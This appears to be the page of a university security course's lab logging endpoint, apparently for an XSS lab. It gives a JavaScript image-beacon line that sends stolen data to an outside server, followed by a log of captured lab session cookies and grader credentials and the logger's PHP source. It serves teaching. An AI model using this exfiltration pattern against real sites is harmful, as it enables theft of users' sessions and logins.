You can use this server side script to extract data from client-side JavaScript. For example, clicking this client-side hyperlink will cause the server to log the payload:
(new Image()).src='https://css.csail.mit.edu/6.566/2024/labs/log.php?' + 'id=my-username' + '&payload=some-string' + '&random=' + Math.random();
The random argument is ignored, but ensures that the browser bypasses its cache when downloading the image. We suggest that you use the random argument in your scripts as well. The ID argument will help you distinguish your log entries from those sent by other students; we suggest picking your MIT Athena username. Newlines are not allowed in javascript: links; if this bothers you, try URL encoding.
If you just want to try out the script, you can use this form. (For your actual attacks in lab 4, you'll probably want to use the JavaScript image technique shown above.)
Below are the most recent logged entries, so that you can check if your attack worked:
Sun, 17 May 2026 14:23:39 +0000: ruf232: PyZoobarLogin=user123#1523fea627f75bf91b7e33f9efccf96147ab1dc1e4320208bbb91e79d0aeef04 Sun, 17 May 2026 14:23:26 +0000: ruf232: PyZoobarLogin=user123#1523fea627f75bf91b7e33f9efccf96147ab1dc1e4320208bbb91e79d0aeef04 Sun, 17 May 2026 14:22:03 +0000: ruf232: PyZoobarLogin=user123#1523fea627f75bf91b7e33f9efccf96147ab1dc1e4320208bbb91e79d0aeef04 Sun, 17 May 2026 14:20:59 +0000: ruf232: PyZoobarLogin=user123#1523fea627f75bf91b7e33f9efccf96147ab1dc1e4320208bbb91e79d0aeef04 Sun, 17 May 2026 14:20:40 +0000: ruf232: PyZoobarLogin=user123#1523fea627f75bf91b7e33f9efccf96147ab1dc1e4320208bbb91e79d0aeef04 Sun, 17 May 2026 14:17:03 +0000: ruf232: PyZoobarLogin=user123#1523fea627f75bf91b7e33f9efccf96147ab1dc1e4320208bbb91e79d0aeef04 Sun, 17 May 2026 14:08:42 +0000: ruf232: PyZoobarLogin=user123#1523fea627f75bf91b7e33f9efccf96147ab1dc1e4320208bbb91e79d0aeef04 Sun, 17 May 2026 14:07:56 +0000: ruf232: PyZoobarLogin=user123#1523fea627f75bf91b7e33f9efccf96147ab1dc1e4320208bbb91e79d0aeef04 Sun, 17 May 2026 14:06:56 +0000: ruf232: PyZoobarLogin=user123#1523fea627f75bf91b7e33f9efccf96147ab1dc1e4320208bbb91e79d0aeef04 Sun, 17 May 2026 14:06:42 +0000: ruf232: PyZoobarLogin=user123#1523fea627f75bf91b7e33f9efccf96147ab1dc1e4320208bbb91e79d0aeef04 Sun, 17 May 2026 14:05:47 +0000: ruf232: PyZoobarLogin=user123#1523fea627f75bf91b7e33f9efccf96147ab1dc1e4320208bbb91e79d0aeef04 Sun, 17 May 2026 14:03:20 +0000: ruf232: PyZoobarLogin=user123#1523fea627f75bf91b7e33f9efccf96147ab1dc1e4320208bbb91e79d0aeef04 Sun, 17 May 2026 13:55:42 +0000: ruf232: PyZoobarLogin=user123#1523fea627f75bf91b7e33f9efccf96147ab1dc1e4320208bbb91e79d0aeef04 Sun, 17 May 2026 13:54:18 +0000: ruf232: PyZoobarLogin=user123#0bb274f8de9076c251324a0b4f3c30187d74157c04ff2bab615704b9c44d2ea8 Sun, 17 May 2026 13:49:02 +0000: ruf232: PyZoobarLogin=user123#0bb274f8de9076c251324a0b4f3c30187d74157c04ff2bab615704b9c44d2ea8 Sun, 17 May 2026 13:44:16 +0000: ruf232: PyZoobarLogin=user123#0bb274f8de9076c251324a0b4f3c30187d74157c04ff2bab615704b9c44d2ea8 Sun, 17 May 2026 13:42:53 +0000: ruf232: PyZoobarLogin=user123#0bb274f8de9076c251324a0b4f3c30187d74157c04ff2bab615704b9c44d2ea8 Sun, 17 May 2026 13:42:13 +0000: ruf232: PyZoobarLogin=user123#0bb274f8de9076c251324a0b4f3c30187d74157c04ff2bab615704b9c44d2ea8 Sun, 17 May 2026 13:33:49 +0000: ruf232: PyZoobarLogin=user123#0bb274f8de9076c251324a0b4f3c30187d74157c04ff2bab615704b9c44d2ea8 Sun, 17 May 2026 13:27:26 +0000: ruf232: some-string123 Fri, 15 May 2026 00:55:56 +0000: PyZoobarLogin=user123#4a55ede68a9ae59712dc7a362a997413924ec1f6aa657bf6511e73eca79b0b41: some-string3554 Fri, 15 May 2026 00:53:03 +0000: PyZoobarLogin=user123#4a55ede68a9ae59712dc7a362a997413924ec1f6aa657bf6511e73eca79b0b41: some-string3554 Fri, 15 May 2026 00:52:46 +0000: PyZoobarLogin=user123#4a55ede68a9ae59712dc7a362a997413924ec1f6aa657bf6511e73eca79b0b41: some-string3554 Fri, 15 May 2026 00:51:40 +0000: PyZoobarLogin=user123#4a55ede68a9ae59712dc7a362a997413924ec1f6aa657bf6511e73eca79b0b41: some-string3554 Fri, 15 May 2026 00:51:33 +0000: PyZoobarLogin=user123#4a55ede68a9ae59712dc7a362a997413924ec1f6aa657bf6511e73eca79b0b41: some-string3554 Fri, 15 May 2026 00:51:26 +0000: PyZoobarLogin=user123#4a55ede68a9ae59712dc7a362a997413924ec1f6aa657bf6511e73eca79b0b41: some-string3554 Fri, 15 May 2026 00:49:48 +0000: PyZoobarLogin=user123#4a55ede68a9ae59712dc7a362a997413924ec1f6aa657bf6511e73eca79b0b41: some-string3554 Fri, 15 May 2026 00:43:26 +0000: PyZoobarLogin=user123#4a55ede68a9ae59712dc7a362a997413924ec1f6aa657bf6511e73eca79b0b41: some-string3554 Fri, 15 May 2026 00:42:13 +0000: PyZoobarLogin=user123#4a55ede68a9ae59712dc7a362a997413924ec1f6aa657bf6511e73eca79b0b41: some-string3554 Fri, 15 May 2026 00:39:53 +0000: ruf: some-string3554 Fri, 15 May 2026 00:32:34 +0000: my-username: some-string Thu, 14 May 2026 23:08:59 +0000: admin456: admin Thu, 14 May 2026 23:04:06 +0000: admin456: admin/admin Thu, 14 May 2026 23:01:57 +0000: admin456: admin/admin Thu, 14 May 2026 22:54:55 +0000: admin123: ></td>.</tr>.<tr>. <td>Password:</td>. <td colspan=2><input type= Thu, 14 May 2026 22:43:26 +0000: admin123: PyZoobarLogin=admin#409348896458d1141009f4ab77e6ca494e2bdd899c28b659aaae3c63caedc423 Thu, 14 May 2026 22:42:56 +0000: admin123: PyZoobarLogin=admin#409348896458d1141009f4ab77e6ca494e2bdd899c28b659aaae3c63caedc423 Thu, 14 May 2026 22:40:17 +0000: admin123: PyZoobarLogin=admin#409348896458d1141009f4ab77e6ca494e2bdd899c28b659aaae3c63caedc423 Thu, 14 May 2026 07:56:10 +0000: ZhangHX: grader/TFUVBDHTNXFM Thu, 14 May 2026 07:55:59 +0000: ZhangHX: grader/PKVVVREVZEUR Thu, 14 May 2026 07:55:53 +0000: ZhangHX: grader/HGJDMQQCLBNG Thu, 14 May 2026 07:55:31 +0000: ZhangHX: PyZoobarLogin=grader#2e8f3b1bcf3558cd957bd7fd5e73f171cb5466c00261128053e592cb5d5d4bfc Thu, 14 May 2026 07:55:25 +0000: ZhangHX: PyZoobarLogin=grader#f361ff112a494f596d652af44b81cfd5266921a1d6e4bb85394224365202df16 Thu, 14 May 2026 07:55:11 +0000: ZhangHX: PyZoobarLogin=grader#411906a8d87bb306689484d1c59a28fbea277266adf99b0a1584fd6ea814c829 Thu, 14 May 2026 07:52:20 +0000: ZhangHX: grader/PSYEYRITXPCV Thu, 14 May 2026 07:52:15 +0000: ZhangHX: grader/JCBJREJHJTPJ Thu, 14 May 2026 07:51:56 +0000: ZhangHX: PyZoobarLogin=grader#2aba838a94d0706b4c97c9ffe3502534e4d5265e2a4d52196df5d8ced2a5f362 Thu, 14 May 2026 07:51:49 +0000: ZhangHX: PyZoobarLogin=grader#d881159601643cdc1f67ae681b5bf230fd3edb9d0dce52d99eda04d85c5cf8dc Thu, 14 May 2026 07:51:38 +0000: ZhangHX: PyZoobarLogin=grader#ad4fbe0a6acb5010fbb510de2027e070c8b1a93a901564644a7898dfee5b72ad Thu, 14 May 2026 07:41:47 +0000: ZhangHX: grader/CGBBBFFXBMJL Thu, 14 May 2026 07:41:41 +0000: ZhangHX: grader/XZIFJQGFAVOR Thu, 14 May 2026 07:41:25 +0000: ZhangHX: PyZoobarLogin=grader#311508c26a69c5ad53e602a02f79e14494c20e1503b6af4200bc6b83dee3887d Thu, 14 May 2026 07:41:18 +0000: ZhangHX: PyZoobarLogin=grader#a442b17b903bfb1efbbfc15d40615be405c72c020c5baaa31cffb90ae1572787 Thu, 14 May 2026 07:41:05 +0000: ZhangHX: PyZoobarLogin=grader#f382e8dd7224882323ba693c8de5a1642b60d2ce6875c7f791179127775dc275 Thu, 14 May 2026 07:34:09 +0000: ZhangHX: grader/BAPLIZBYANMF Thu, 14 May 2026 07:33:51 +0000: ZhangHX: PyZoobarLogin=grader#94cd01c89a6c0662b9d958a3303895961d39b1598249f5a61cc8b6a0b996de7c Thu, 14 May 2026 07:33:45 +0000: ZhangHX: PyZoobarLogin=grader#134d868652eff2cc554ecb411b33fd36d4a34ef7f42341a24f3bbfd5712479ef Thu, 14 May 2026 07:33:31 +0000: ZhangHX: PyZoobarLogin=grader#0db86660228b15a564f1b60102906b66c2e7013b3ddf472f6e78c5aa66709710 Thu, 14 May 2026 07:25:01 +0000: ZhangHX: grader/DOKZNEGAWYRI Thu, 14 May 2026 07:24:34 +0000: ZhangHX: PyZoobarLogin=grader#d832e51b6147aef1da324155d470a210a59c2fcb97295fbd213dec1dd55ace70 Thu, 14 May 2026 07:24:27 +0000: ZhangHX: PyZoobarLogin=grader#b377f1c792d9417704235b1a4eee50bd2d9fd761968d2f1d177adc58137f9c49 Thu, 14 May 2026 07:24:14 +0000: ZhangHX: PyZoobarLogin=grader#a763a4a89a594f440ed1a9899bc118a08c7b5c5241b146cba0e763c666219b90 Thu, 14 May 2026 07:15:12 +0000: ZhangHX: grader/QFHUCYPLZJHZ Thu, 14 May 2026 07:14:45 +0000: ZhangHX: PyZoobarLogin=grader#740c0a04fb7b9ee7ab9a67b09c4c970aaecca952bea3cd0bb08a4f21d5650a37 Thu, 14 May 2026 07:14:38 +0000: ZhangHX: PyZoobarLogin=grader#7dcd57e853b96c6f6b876435de0e518770b54cabbde86f8310cefa750cd059d1 Thu, 14 May 2026 07:14:25 +0000: ZhangHX: PyZoobarLogin=grader#818a3edc24f4475539e5292a888247b8bc40eae1e06d7c89c20155b17320504f Thu, 14 May 2026 07:07:09 +0000: ZhangHX: grader/WUUGKEURMIGP Thu, 14 May 2026 07:06:41 +0000: ZhangHX: PyZoobarLogin=grader#48eb36995697b7739bd508284fc9e9e74017ae70e9dda32fde5bc9be1955103f Thu, 14 May 2026 07:06:35 +0000: ZhangHX: PyZoobarLogin=grader#8e4187182f1e772289f07a780b4529429f0bcea1fecef786374ad69ac68d8e1b Thu, 14 May 2026 07:06:22 +0000: ZhangHX: PyZoobarLogin=grader#949dfc86fd51807c0ab08823b174c64518534c2f89ae76e9471e8ec258ee7905 Thu, 14 May 2026 06:38:08 +0000: ZhangHX: grader/BVZCPXXAUEFW Thu, 14 May 2026 06:38:03 +0000: ZhangHX: grader/IYORWDFXUILK Thu, 14 May 2026 06:37:41 +0000: ZhangHX: PyZoobarLogin=grader#7af81dfac24fe9949f795de6bb1f801dcf818cf2d1e76a272d71b81d21b44dd6 Thu, 14 May 2026 06:37:35 +0000: ZhangHX: PyZoobarLogin=grader#da20712941abf2a3aab15081098bacbaaa24f134d2a45fd26c880eb6dd57ecb9 Thu, 14 May 2026 06:37:23 +0000: ZhangHX: PyZoobarLogin=grader#d7b80c5e60790501b1695234c3f672c3daa7d810d7076f23eee43989ab4dc8cc Thu, 14 May 2026 06:29:01 +0000: ZhangHX: PyZoobarLogin=grader#d71dae4a54bfcb26939266454c1a05d7a373e9183eb11fa69f7fba54184a8f93 Thu, 14 May 2026 06:28:55 +0000: ZhangHX: PyZoobarLogin=grader#5a16d65c24a5ce5d333a1df2abcd022d6530735b263197ee151be41cc3ade2f9 Thu, 14 May 2026 06:28:43 +0000: ZhangHX: PyZoobarLogin=grader#8cad6cac13d91d33c76290e361757328ff0e6275f4d22d17048962de4966bff7 Wed, 13 May 2026 17:06:11 +0000: ZhangHX: grader/RETFBWCWNQJE Wed, 13 May 2026 17:05:46 +0000: ZhangHX: PyZoobarLogin=grader#0300d531e1c36f6fbc4728812e08b4ffe67290105d6b04b833369f4b66332d4f Wed, 13 May 2026 17:05:39 +0000: ZhangHX: PyZoobarLogin=grader#4fd91b23e49dd6a4ce714eaf6c85c0f8c1399eab89e1974d395d3e042d400239 Wed, 13 May 2026 17:05:28 +0000: ZhangHX: PyZoobarLogin=grader#925dd4d13add6986b2eb6df08f3f37012987f2ba30a173733dbb26456b4343a9 Wed, 13 May 2026 16:36:35 +0000: ZhangHX: 123/456 Wed, 13 May 2026 16:31:21 +0000: ZhangHX: PyZoobarLogin=grader#7eefca39d70804f861514907466dda2669655c823b2cf2cd1dceecc002e52545 Wed, 13 May 2026 16:31:14 +0000: ZhangHX: PyZoobarLogin=grader#d773068a3535df95677053df8c37c9598abcbb398707844ab12cd0d46c7fee99 Wed, 13 May 2026 16:31:02 +0000: ZhangHX: PyZoobarLogin=grader#416cc218b8e47634db63eb8aaab37d414b618bab6f763867e3f2c3e443516915 Wed, 13 May 2026 16:13:17 +0000: ZhangHX: 111 Wed, 13 May 2026 15:50:36 +0000: 2222: 3333 Wed, 13 May 2026 15:46:02 +0000: ZhangHX: PyZoobarLogin=grader#1500ad8cb28f897fc7db7aea227b74b797e7fca093a6da74cf8f8447167a954c Wed, 13 May 2026 15:26:02 +0000: ZhangHX: PyZoobarLogin=grader#111390f6cc7b9a881a1227231cf4691d473e416938126713589c44097d6e040b Wed, 13 May 2026 15:25:56 +0000: ZhangHX: PyZoobarLogin=grader#2f6a267eb7bbe70c1ebd08749aff17002b27d22e47dd0a38724aff118bdf8243 Wed, 13 May 2026 15:25:43 +0000: ZhangHX: PyZoobarLogin=grader#58c996d989988ba276b39ccc6cddb7d8a37613217b3f12b5294ba183e195f764 Wed, 13 May 2026 15:24:27 +0000: ZhangHX: PyZoobarLogin=grader#ee50df51af4b5dfc7a42f5cc34558a805350d2a5d22f58602f68a6263bdcebad Wed, 13 May 2026 15:24:20 +0000: ZhangHX: PyZoobarLogin=grader#ccf6d13e39ac37faad387b4c1d75a0179adc8b1b9171f8289badd3502e7bba1a Wed, 13 May 2026 15:24:07 +0000: ZhangHX: PyZoobarLogin=grader#85b6a0366984618f7e87e15f449462a37c782210d8a8ad8f45646e30e8ca0037 Wed, 13 May 2026 15:22:26 +0000: ZhangHX: PyZoobarLogin=grader#91cb8af14547a79bf646e13b03d02593b76fc6227b077de16580d51f4ed880b0 Wed, 13 May 2026 15:22:20 +0000: ZhangHX: PyZoobarLogin=grader#805a490abdf3ed557f25c82e219b27c4ae8236cf1980fad980d5fddb8f8f3b65 Wed, 13 May 2026 15:22:09 +0000: ZhangHX: PyZoobarLogin=grader#beb062cbfaa8ee62aa0bbdc52cd4ada3f83f73a579a10eb6558b2cc53aa3c4e3 Wed, 13 May 2026 15:04:30 +0000: ZhangHX: PyZoobarLogin=grader#3c106d233c6f9d58c941fc7e21e440302b677aa4721e26613867324e5ddb9b73 Wed, 13 May 2026 15:04:24 +0000: ZhangHX: PyZoobarLogin=grader#44ca7a4ef9a66eec0ff5e51a385fb123d6a43b1480eb9eacf938ac07ca65aae2 Wed, 13 May 2026 15:04:10 +0000: ZhangHX: PyZoobarLogin=grader#dbf97465d59b506a450a96517d7af371a057b386c4e5e2ff3103f4bccea61408
In case you are curious, here is the source code of this page.
<?php header("Access-Control-Allow-Origin: *"); do { if (!array_key_exists("id", $_REQUEST)) { break; } $id = $_REQUEST['id']; if (strlen($id) > 1000) { header("HTTP/1.0 413 Payload Too Large"); echo "ID value is larger than 1000 bytes"; return; } if (!array_key_exists("payload", $_REQUEST)) { header("HTTP/1.0 400 Bad Request"); echo "No payload given"; return; } $payload = $_REQUEST['payload']; if (empty($payload)) { header("HTTP/1.0 400 Bad Request"); echo "Empty payload given"; return; } if (strlen($payload) > 1000) { header("HTTP/1.0 413 Payload Too Large"); echo "Payload is larger than 1000 bytes"; return; } if (!function_exists('apcu_add')) { header("HTTP/1.0 501 Not Implemented"); echo "APCu not enabled, so no rate limiting; refusing all requests"; return; } if (apcu_add($payload, true, 5) === false) { // exact same $payload was sent in the past 5 seconds header("HTTP/1.0 429 Too Many Requests"); echo "That exact payload was sent very recently; rejecting"; return; } $payload = str_replace(array("\n", "\r"), '.', $payload); $id = str_replace(array("\n", "\r"), '.', $id); $file = fopen("/tmp/6.566-2024-logger.txt", "c+"); if ($file === false) { header("HTTP/1.0 503 Service Unavailable"); echo "Failed to open log file"; return; } if (!flock($file, LOCK_EX)) { header("HTTP/1.0 503 Service Unavailable"); echo "Failed to lock log file"; return; } $lines = array(); while (!feof($file) && count($lines) < 100) { $lines[] = fgets($file); } ftruncate($file, 0); rewind($file); fwrite($file, date(DATE_RFC2822) . ": " . $id . ": " . $payload . "\n"); foreach ($lines as &$line) { fwrite($file, $line); } flock($file, LOCK_UN); fclose($file); echo "Logged!"; return; } while(0); $link = "(new Image()).src=" . "'https://css.csail.mit.edu/6.566/2024/labs/log.php?'" . " + 'id=my-username'" . " + '&payload=some-string' + '&random='" . " + Math.random()"; ?><!DOCTYPE html> <html> <head> <link rel="stylesheet" type="text/css" href="labs.css" /> <title>Lab 4 Logging Script</title> </head> <body> <h1>Lab 4 Logging Script</h1> <p> You can use this server side script to extract data from client-side JavaScript. For example, clicking this client-side hyperlink will cause the server to log the payload: </p> <pre class="tty"><a href="javascript:void(<?=$link;?>)"><?=$link;?>;</a></pre> <p> The random argument is ignored, but ensures that the browser bypasses its cache when downloading the image. We suggest that you use the random argument in your scripts as well. The ID argument will help you distinguish your log entries from those sent by other students; we suggest picking your MIT Athena username. Newlines are not allowed in <tt>javascript:</tt> links; if this bothers you, try <a href="https://meyerweb.com/eric/tools/dencoder/">URL encoding</a>. </p> <h2>Test form</h2> <p> If you just want to try out the script, you can use this form. (For your actual attacks in lab 4, you'll probably want to use the JavaScript image technique shown above.) </p> <form method="GET" action=""> <label for="id">ID:</label><br /> <input name="id" placeholder="your-mit-username" size="40" /> <i>(some identifier to locate your payload in the log)</i> <br /> <br /> <label for="payload">Payload:</label><br /> <input name="payload" placeholder="some-string" size="40" /> <i>(the information you stole)</i> <br /> <input type="submit" value="Log" name="log_submit" /> </form> <h2>Logged entries</h2> <p> Below are the most recent logged entries, so that you can check if your attack worked: </p> <pre class="tty"><?php $lines = file_get_contents("/tmp/6.566-2024-logger.txt"); echo htmlspecialchars($lines); ?></pre> <h2>Source code</h2> <p>In case you are curious, here is the source code of this page.</p> <pre><?php highlight_file(__FILE__); ?></pre> </body> </html>